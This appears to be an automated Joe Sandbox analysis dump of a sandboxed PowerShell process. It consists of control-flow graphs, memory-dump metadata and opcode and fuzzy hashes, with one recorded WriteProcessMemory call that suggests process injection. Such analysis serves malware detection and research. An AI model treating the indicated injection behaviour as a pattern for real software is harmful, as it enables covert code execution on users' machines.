                                                                                        control_flow_graph 3902 7571f06-7571f18 3903 7571f1a-7571f30 3902->3903 3904 7571f88-7571f91 3902->3904 3907 7571f32-7571f3e 3903->3907 3908 7571f40 3903->3908 3905 7571f93-7571f99 3904->3905 3906 7571fa9-7571fb2 3904->3906 3910 7571f9d-7571fa7 3905->3910 3911 7571f9b 3905->3911 3912 7571fb7-7571fbc 3906->3912 3909 7571f42-7571f44 3907->3909 3908->3909 3913 7571f46-7571f51 3909->3913 3914 7571fbf-7571fc9 3909->3914 3910->3906 3911->3906 3918 7571f53-7571f59 3913->3918 3919 7571f6f 3913->3919 3916 7571fd5-7571fdb 3914->3916 3917 7571fcb-7571fd2 3914->3917 3922 7571fe1-7571fed 3916->3922 3923 7571fdd-7571fdf 3916->3923 3920 7571f5f-7571f6b 3918->3920 3921 7571f5b-7571f5d 3918->3921 3924 7571f71-7571f7d 3919->3924 3925 7571f6d 3920->3925 3921->3925 3926 7571fef-757200b 3922->3926 3923->3926 3924->3914 3931 7571f7f-7571f86 3924->3931 3925->3924 3931->3904 3932 757200e-757204b 3931->3932 3936 7572065-757206c 3932->3936 3937 757204d-7572053 3932->3937 3938 7572084-7572085 3936->3938 3939 757206e-7572074 3936->3939 3940 7572057-7572063 3937->3940 3941 7572055 3937->3941 3942 7572076 3939->3942 3943 7572078-757207a 3939->3943 3940->3936 3941->3936 3942->3938 3943->3938
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7570000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $jq$$jq
                                                                                        • API String ID: 0-3720491408
                                                                                        • Opcode ID: 7325450e37913c99a77a9e2eca01b9a2543d6b422097eaff36010d9df910bd7c
                                                                                        • Instruction ID: d5282e5af1e3325a5d8abeae8f239bf5e1169e96dbd70383706a240eff26c35c
                                                                                        • Opcode Fuzzy Hash: 7325450e37913c99a77a9e2eca01b9a2543d6b422097eaff36010d9df910bd7c
                                                                                        • Instruction Fuzzy Hash: E011D6B160978A8FD7128A14E850AE1BF76BFC3214F1840DBE644DB193D731D806C771

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 3962 b929a8-b929da 3963 b92a81-b92a89 3962->3963 3964 b929e0-b929f6 3962->3964 3969 b92a8b-b92a91 3963->3969 3970 b92a3d-b92a3f 3963->3970 3965 b929f8 3964->3965 3966 b929fb-b92a0e 3964->3966 3965->3966 3966->3963 3975 b92a10-b92a1d 3966->3975 3971 b92a93-b92ab4 3969->3971 3972 b92a45-b92a4b 3969->3972 3973 b92a40 3970->3973 3974 b92ab5-b92aca 3970->3974 3971->3974 3976 b92a4e-b92a52 3972->3976 3973->3976 3977 b92a41-b92a44 3973->3977 3978 b92acc-b92ad3 3974->3978 3979 b92b10 3974->3979 3980 b92a1f 3975->3980 3981 b92a22-b92a31 3975->3981 3986 b92a34 3976->3986 3987 b92a54-b92a80 3976->3987 3977->3972 3983 b92ad5-b92ae2 3978->3983 3984 b92ae4 3978->3984 3982 b92b13-b92b4f 3979->3982 3980->3981 3981->3986 3996 b92bcb-b92bd6 3982->3996 3997 b92b51-b92b5a 3982->3997 3988 b92ae6-b92ae8 3983->3988 3984->3988 3986->3963 3990 b92a36-b92a3a 3986->3990 3993 b92aea-b92aed 3988->3993 3994 b92aef-b92af1 3988->3994 3990->3970 3998 b92b0e 3993->3998 3999 b92af3-b92b00 3994->3999 4000 b92b02 3994->4000 4001 b92bd8-b92bdb 3996->4001 4002 b92be5-b92c07 3996->4002 3997->3996 4003 b92b5c-b92b62 3997->4003 3998->3982 4005 b92b04-b92b06 3999->4005 4000->4005 4001->4002 4013 b92cc8-b92d74 4002->4013 4014 b92c0d-b92c16 4002->4014 4006 b92b68-b92b75 4003->4006 4007 b92dfc-b92e69 4003->4007 4005->3998 4010 b92bc2-b92bc9 4006->4010 4011 b92b77-b92ba1 4006->4011 4022 b92e79-b92eb2 WriteProcessMemory 4007->4022 4023 b92e6b-b92e77 4007->4023 4010->3996 4010->4003 4025 b92bbe 4011->4025 4026 b92ba3-b92ba6 4011->4026 4049 b92d8e-b92da1 4013->4049 4050 b92d76-b92d8c 4013->4050 4014->4007 4016 b92c1c-b92c51 4014->4016 4033 b92c6b-b92c7e 4016->4033 4034 b92c53-b92c69 4016->4034 4027 b92ebb-b92ecf 4022->4027 4028 b92eb4-b92eba 4022->4028 4023->4022 4025->4010 4030 b92ba8-b92bab 4026->4030 4031 b92bb2-b92bbb 4026->4031 4028->4027 4030->4031 4036 b92c80-b92c87 4033->4036 4034->4036 4038 b92c89-b92c9a 4036->4038 4039 b92cac 4036->4039 4038->4039 4043 b92c9c-b92ca5 4038->4043 4039->4013 4043->4039 4051 b92da3-b92daa 4049->4051 4050->4051 4052 b92db9 4051->4052 4053 b92dac-b92db2 4051->4053 4052->4007 4053->4052
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3272796744.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_b90000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7aa8dcaadf2aa27e445e0436eb9fcfab56d069b7ee13f378a3d82dd687a70834
                                                                                        • Instruction ID: d7c3b395b9ad1e924339f3bdc9b8fb03419ae8017307916278d833acd1f635a4
                                                                                        • Opcode Fuzzy Hash: 7aa8dcaadf2aa27e445e0436eb9fcfab56d069b7ee13f378a3d82dd687a70834
                                                                                        • Instruction Fuzzy Hash: 8E02E775E00209AFDB15DF98D584A9EBBF6FF48310F2485A9E805AB365C731ED81CB90

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 4143 6f534c3-6f534c5 4144 6f534c7-6f5350c 4143->4144 4145 6f53530-6f5356e 4143->4145 4152 6f53512-6f5352c 4144->4152 4153 6f53bec-6f53c35 4144->4153 4150 6f53573-6f535ba 4145->4150 4157 6f535bc-6f535e1 4150->4157 4158 6f535e9-6f5361e 4150->4158 4152->4145 4169 6f53c3a-6f53d42 4153->4169 4157->4158 4158->4153 4162 6f53624-6f53648 4158->4162 4162->4153 4165 6f5364e-6f536aa 4162->4165 4182 6f536ac-6f536c1 4165->4182 4183 6f536cf-6f536d5 4165->4183 4174 6f53d44-6f53d69 4169->4174 4175 6f53d71-6f53da6 4169->4175 4174->4175 4180 6f53e91-6f53ed5 4175->4180 4181 6f53dac-6f53dda 4175->4181 4202 6f53eda 4180->4202 4181->4180 4188 6f53de0-6f53e52 4181->4188 4185 6f536db-6f53722 4182->4185 4183->4185 4192 6f53724-6f53749 4185->4192 4193 6f53751-6f5375e 4185->4193 4208 6f53e54-6f53e6f 4188->4208 4209 6f53e80-6f53e86 4188->4209 4192->4193 4193->4153 4195 6f53764-6f53792 4193->4195 4195->4153 4200 6f53798-6f537c6 4195->4200 4200->4153 4205 6f537cc-6f537fa 4200->4205 4202->4202 4205->4153 4210 6f53800-6f538dd 4205->4210 4209->4180 4210->4169 4220 6f538e3-6f538fd 4210->4220 4221 6f5392c-6f53939 4220->4221 4222 6f538ff-6f53924 4220->4222 4223 6f53ba1-6f53bea 4221->4223 4224 6f5393f-6f53983 4221->4224 4222->4221 4223->4169 4224->4223 4230 6f53989-6f539a9 4224->4230 4230->4223 4234 6f539af-6f539e2 4230->4234 4234->4223 4238 6f539e8-6f53a48 4234->4238 4238->4223 4242 6f53a4e-6f53aae 4238->4242 4242->4223 4246 6f53ab4-6f53b3d 4242->4246 4246->4223 4251 6f53b3f-6f53b9c 4246->4251 4251->4169
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3303021568.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ,Fth
                                                                                        • API String ID: 0-3079498608
                                                                                        • Opcode ID: 79e8569acecbe38e4bb6314f2adb2512cb0fff735cc8264e4a50c540a9af4a9e
                                                                                        • Instruction ID: afc877627c732fb9b38273a362aa2ebec4eb8c512815e7c2011a0f186d2ac49d
                                                                                        • Opcode Fuzzy Hash: 79e8569acecbe38e4bb6314f2adb2512cb0fff735cc8264e4a50c540a9af4a9e
                                                                                        • Instruction Fuzzy Hash: 7D3234B4A001149FDB54DB18C990B99BBB2FF85304F55C1E9DA09AB341CB72EE82CF91

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 4256 b92ee0-b92efb 4260 b92e79-b92eb2 WriteProcessMemory 4256->4260 4261 b92e6b-b92e77 4256->4261 4262 b92ebb-b92ecf 4260->4262 4263 b92eb4-b92eba 4260->4263 4261->4260 4263->4262
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000001), ref: 00B92EA5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3272796744.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_b90000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 262f675f0d06a2af0031142cfd3fdd214dcea1fbdc0758a9ce81307956e1a7fa
                                                                                        • Instruction ID: 7eac120189088bb39ef826a96aeb2fd8775c3a46fae87906f7536f76341e65eb
                                                                                        • Opcode Fuzzy Hash: 262f675f0d06a2af0031142cfd3fdd214dcea1fbdc0758a9ce81307956e1a7fa
                                                                                        • Instruction Fuzzy Hash: 403137B5D053889FCB10DFA9C884ADEBFF4FF49310F10846AE918A7251D378A944CBA5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3308515067.00000000081E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_81e0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (g)
                                                                                        • API String ID: 0-1963946786
                                                                                        • Opcode ID: 5ac24e6d91c76fcdadb792ed3761a237ed2cd5d4132b1d37a641c4b594eb3561
                                                                                        • Instruction ID: 43a6086fa405b77519b18ef6b4618c44f173ff610ace9d2a9820cf55ed1ef871
                                                                                        • Opcode Fuzzy Hash: 5ac24e6d91c76fcdadb792ed3761a237ed2cd5d4132b1d37a641c4b594eb3561
                                                                                        • Instruction Fuzzy Hash: 55712670E05618CFDB28CF69D884B9DBBF2FF65315F9080AAE018A7260DB759985CF50
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3308515067.00000000081E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_81e0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: QfC
                                                                                        • API String ID: 0-4294289396
                                                                                        • Opcode ID: a06359922c2939f2d2ab78b0289d4f36ddb4ede1d8317f93c11cf6c5197a9a7d
                                                                                        • Instruction ID: 1859db0d01697ab243542f75bade673e94037ecc7bcf7dc439261d29fb2b129e
                                                                                        • Opcode Fuzzy Hash: a06359922c2939f2d2ab78b0289d4f36ddb4ede1d8317f93c11cf6c5197a9a7d
                                                                                        • Instruction Fuzzy Hash: 4651B374D01209CFDB18CFA9D594ADDBBB2AF88301F20852EE416AB3A4DB755941CF50
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3308515067.00000000081E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_81e0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: QfC
                                                                                        • API String ID: 0-4294289396
                                                                                        • Opcode ID: 0bd5db1fa936e902ff8533dd09eb5639e8af3ac0080c872cacac4eb337a0e5c5
                                                                                        • Instruction ID: 353f2a4a8c5919203170804659af14c354aa7084604c69486cd9f6529df1bfbb
                                                                                        • Opcode Fuzzy Hash: 0bd5db1fa936e902ff8533dd09eb5639e8af3ac0080c872cacac4eb337a0e5c5
                                                                                        • Instruction Fuzzy Hash: 24410670E01209DFDB18CFB9D584ADDBBB2AF89301F24852EE41AAB365CB359941CF50
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7570000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq
                                                                                        • API String ID: 0-3676250632
                                                                                        • Opcode ID: 491a98b41f25de42183aae29fb6f33a221d8ce2dacc9cb100aa0e97686586fa4
                                                                                        • Instruction ID: 31db9c295fe3b4318d12befd623b6a4027d6688d431d9a95672678562d277811
                                                                                        • Opcode Fuzzy Hash: 491a98b41f25de42183aae29fb6f33a221d8ce2dacc9cb100aa0e97686586fa4
                                                                                        • Instruction Fuzzy Hash: 2D3123F0A053428FDB219A34A5047FA7FE1BF86224F9444ABD448DB1D2EB78D586C772
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3303021568.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (ojq
                                                                                        • API String ID: 0-3210286679
                                                                                        • Opcode ID: 2e933677ac56f1804aa1d5df72afad628e8cb5965386166f79d03439d529cee5
                                                                                        • Instruction ID: 4ef290048c7d5d4988c3b607463889fdaa3754422ec594b0aa8fd0404afbe2da
                                                                                        • Opcode Fuzzy Hash: 2e933677ac56f1804aa1d5df72afad628e8cb5965386166f79d03439d529cee5
                                                                                        • Instruction Fuzzy Hash: 61219232E18209DFEBA48EA4C94CBA57762BF41305F568465EE024F2D0DB36DC84CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7570000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5c3093f4b7e2ff056fef7fa4c50a05db7bbe0b7a2dee6d87f73f21946b943cc3
                                                                                        • Instruction ID: 664e50ba36149636b44c909b542ab9637c2ddedf837ac009014358968a8e6178
                                                                                        • Opcode Fuzzy Hash: 5c3093f4b7e2ff056fef7fa4c50a05db7bbe0b7a2dee6d87f73f21946b943cc3
                                                                                        • Instruction Fuzzy Hash: 226238B4B10215CFDB14CB18C994BA9BBB2FB85314F54C0AAD9099B352CB72ED85CF91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7570000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8a5321f25991202d53eed1361be758381e040121360c5c9ff5ba85c4ec18a980
                                                                                        • Instruction ID: 67806177015cc8d7c6bc1076ade1b276096b13ddc17e8886218412ba8a2e8a75
                                                                                        • Opcode Fuzzy Hash: 8a5321f25991202d53eed1361be758381e040121360c5c9ff5ba85c4ec18a980
                                                                                        • Instruction Fuzzy Hash: 884239B4B10215DFDB54CB18C990BA9BBB2FB85314F14C0AAD9099B352CB72ED85CF91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3273891248.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_4660000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e3c62963878d52891abbac24566ed038f48b91a3104502a793a0732dce34ffca
                                                                                        • Instruction ID: fc018b3130966cd35417ea2f5280b5a50876a53818b331265d2904209a4be5b3
                                                                                        • Opcode Fuzzy Hash: e3c62963878d52891abbac24566ed038f48b91a3104502a793a0732dce34ffca
                                                                                        • Instruction Fuzzy Hash: 86E1A2A690E3D15FD703DB689EE64D5BF70EE1326430A01D7C5C1CB1A3E915AA0BC7A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3273891248.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_4660000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d14f6c00ec1251b712137c05fffbf04344f7849be7f795312f19e1082ad26708
                                                                                        • Instruction ID: ba247ff6dc8f348251e0f1dcf0a95cf25bcf094192519f03de465ff68804c556
                                                                                        • Opcode Fuzzy Hash: d14f6c00ec1251b712137c05fffbf04344f7849be7f795312f19e1082ad26708
                                                                                        • Instruction Fuzzy Hash: DFC1AD74A00645CFCB05DF58C494AAEFBB1FF48310B24859AD916AB3A5D735FC90CBA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3303021568.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fd8b5a165bb3fe313b017547c2a5b750cfc1b9b0b9668885d56993f9ceff5c75
                                                                                        • Instruction ID: 56d9371d1ad79e132646cb94e467ebfb9235f168de46859cc8eb2861c9ae40f4
                                                                                        • Opcode Fuzzy Hash: fd8b5a165bb3fe313b017547c2a5b750cfc1b9b0b9668885d56993f9ceff5c75
                                                                                        • Instruction Fuzzy Hash: A54193B0B00108AFCB14DF6C8590A6E7BE3AFC9714B998469DD059B391DB32ED4187E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7570000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 600dccc981cfe3d6d7a3f43396fdd74a15122e78b976f36b6e9e4209ef4fdf30
                                                                                        • Instruction ID: ccd9a16d473f1e061ed6a1765ffe4ca4604b6d3441cb35c5ca4cb60cbb85757c
                                                                                        • Opcode Fuzzy Hash: 600dccc981cfe3d6d7a3f43396fdd74a15122e78b976f36b6e9e4209ef4fdf30
                                                                                        • Instruction Fuzzy Hash: F741F6B1B001559BCB549A7999802EEBBA6BFD4220B24847ECC45DB345DB31DE41C7E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3273891248.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_4660000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0bbf044040dc0f4fba683423e4b583dee02815083f26428b1d0181b3aacc30c8
                                                                                        • Instruction ID: 02f3281d4f51bbc3f0567018d7add21bbe7a2402b4df740e078aa5f4ac3b131f
                                                                                        • Opcode Fuzzy Hash: 0bbf044040dc0f4fba683423e4b583dee02815083f26428b1d0181b3aacc30c8
                                                                                        • Instruction Fuzzy Hash: B3511A74A002089FCB04CFA8D584AADFBF6BF88314F24C159E845AB365D735ED86CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3273891248.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_4660000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 738f16f41fb137c60c398ab7c85dfac533565b27543ff170fb0a2ab70ee027ad
                                                                                        • Instruction ID: faebcaa47336fd74020a4483a11d7f10c5662d0514156db7c97f0729ede6c9cf
                                                                                        • Opcode Fuzzy Hash: 738f16f41fb137c60c398ab7c85dfac533565b27543ff170fb0a2ab70ee027ad
                                                                                        • Instruction Fuzzy Hash: BD412874A00505DFCB05DF59C5A4AEAFBB1FF48310B15859AD506AB3A4D732FC90CBA4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3303021568.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9946b0e079a0e28e39e1f7e93a8c96e8b8c456db74ba3f27ff4752ce86718713
                                                                                        • Instruction ID: 8223820df1654434aa9732161b00d52e83b99ca59c3195a076fea65d87fae90b
                                                                                        • Opcode Fuzzy Hash: 9946b0e079a0e28e39e1f7e93a8c96e8b8c456db74ba3f27ff4752ce86718713
                                                                                        • Instruction Fuzzy Hash: 9B4160B4B00108AFCB14DF58C590AAEBBE2FF88314B698459ED059B351CB32ED41CBE1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3308515067.00000000081E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_81e0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6cbfc8f0cd11db5e1adcb6340af0e5daa6f8f8d51d71dbf035ec5f43eb7002c8
                                                                                        • Instruction ID: 73c3ba89dc976b25b4d7d4e06e59678ba0d320e8bad2323bbfbd227ca204b79e
                                                                                        • Opcode Fuzzy Hash: 6cbfc8f0cd11db5e1adcb6340af0e5daa6f8f8d51d71dbf035ec5f43eb7002c8
                                                                                        • Instruction Fuzzy Hash: EB413C70E04609DFDB05CFA9D9846AEBBF6FF89311F1080A9E809A7354DB759942CF90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3273847306.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_4650000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5a7f1ca185ff23b0c50622dac4deabd6c5a45490bf8de11443440f9630b03585
                                                                                        • Instruction ID: a88fcc6b5be2d83ee528ce1b8d3690a2d5ad461e3f31edd792136691d95af695
                                                                                        • Opcode Fuzzy Hash: 5a7f1ca185ff23b0c50622dac4deabd6c5a45490bf8de11443440f9630b03585
                                                                                        • Instruction Fuzzy Hash: 52315974E042198FDB05DFAAC8446EEFBF2EB8A311F108466D915B3350EB785941CFA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7570000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d52e3ae60b4dfc54e32d42007aa9018debc89a23ce588a2873460af353972d84
                                                                                        • Instruction ID: 59829afbaeb6d141320bc103c97c707f1bab9c8b21eef294291147b41d0c44ea
                                                                                        • Opcode Fuzzy Hash: d52e3ae60b4dfc54e32d42007aa9018debc89a23ce588a2873460af353972d84
                                                                                        • Instruction Fuzzy Hash: 6A213DB1A003A59FCB519F7999401EABFF5BF89270B2885AACC49DB242D7349D40C7E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3273847306.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_4650000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f3646c7ee76ebe674d2c2168c01655b0b15750f7291b20dd23d78cf9c8391242
                                                                                        • Instruction ID: 2c724548ff06b78a9dc3f125b8e2bfb0d366da7f9bf7d05e08c3ac02f2fb98f1
                                                                                        • Opcode Fuzzy Hash: f3646c7ee76ebe674d2c2168c01655b0b15750f7291b20dd23d78cf9c8391242
                                                                                        • Instruction Fuzzy Hash: 7F316BB0D05208DFDB40DFA8C1887ADBBF1EF84344F1084AAD815A7754EBB85A84CF81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3273847306.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_4650000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 28317e914f9a1309c1f1377d788814c36e805581fa94d39f1cfa8a228ecf7a19
                                                                                        • Instruction ID: f9c780a3162b9387397d2b4c939052cd2f2243a98818792a950bdcf11d8f39c2
                                                                                        • Opcode Fuzzy Hash: 28317e914f9a1309c1f1377d788814c36e805581fa94d39f1cfa8a228ecf7a19
                                                                                        • Instruction Fuzzy Hash: 07315CB0D05218DFDB40DFA8C1887AEBBF2EB48745F2090A9D905A3754FBB45A80CF41
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3273443495.0000000002F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F4D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_2f4d000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b00c4fc27eb49bb40bd201c649f6ab460a44bcfeeff9e4ed56f815a108ef2023
                                                                                        • Instruction ID: a9ae6066ae55e9482c99c75530a36f464375042d308d5ae76f92b8507400131e
                                                                                        • Opcode Fuzzy Hash: b00c4fc27eb49bb40bd201c649f6ab460a44bcfeeff9e4ed56f815a108ef2023
                                                                                        • Instruction Fuzzy Hash: 8A21F5B2604244DFFB05DF14D980B26BF65FBC8354F24C569EE090B256C7BAD416C7A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3273847306.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_4650000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8f351bf22991f8aea55dc0cf749ecf6e41b8be9a20b65ae9fa2afc9cbbb80de9
                                                                                        • Instruction ID: d4b534416a9adee635072474811d8a456bea6872272e981055dee0ca35c651c4
                                                                                        • Opcode Fuzzy Hash: 8f351bf22991f8aea55dc0cf749ecf6e41b8be9a20b65ae9fa2afc9cbbb80de9
                                                                                        • Instruction Fuzzy Hash: 4F213C74E05219CFCF04CFA9C6486EEBBB5FB89311F108426D816B3350EB766A45CBA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3308515067.00000000081E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_81e0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bc81f1b340daa25d8b53f3418332bb133cdcc0d0081537a1517e4d1d618bc0c2
                                                                                        • Instruction ID: f77d163f2bc3d2b1f436eb915fcb2af7a4e0dc7c6565e810e852a88342323aa0
                                                                                        • Opcode Fuzzy Hash: bc81f1b340daa25d8b53f3418332bb133cdcc0d0081537a1517e4d1d618bc0c2
